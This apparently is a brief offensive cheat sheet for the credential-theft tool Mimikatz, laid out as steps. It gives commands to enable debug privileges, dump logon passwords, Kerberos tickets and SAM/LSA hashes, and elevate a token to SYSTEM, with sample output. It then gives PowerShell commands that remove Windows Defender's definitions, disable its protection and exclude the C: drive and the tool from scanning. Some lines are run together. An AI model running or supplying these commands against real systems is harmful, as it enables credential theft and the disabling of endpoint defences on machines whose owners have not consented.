Mimikatz
# The steps are:
mimikatz.exe
mimikatz # privilege::debug
mimikatz # log nameoflog.log
mimikatz # sekurlsa::logonpasswords
# Kerberos tickets
mimikatz # sekurlsa::tickets
# Export tickets
mimikatz # kerberos::list /export
# To elevate privileges
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::whoami
* Process Token : 623884 vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-
1210654043-1600862990-1000 (14g,24p) Primary
* Thread Token : no token
mimikatz # token::elevate
Token Id : 0
User name :
SID name : AUTORITE NT\System
# Dump the hashes
mimikatz # lsadump::sam
mimikatz # lsadump::lsaBypass Windows Defender
c:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All -DisableIOAVProtection $true
Add-MpPreference -ExclusionPath "c:\"
$mimikatz = 'C:\Users\Gentil Kiwi\Desktop\mimikatz.exe' ; Add-MpPreference -ExclusionPath $mimikatz -AttackSurfaceReductionOnlyExclusions $mimikatz Last updated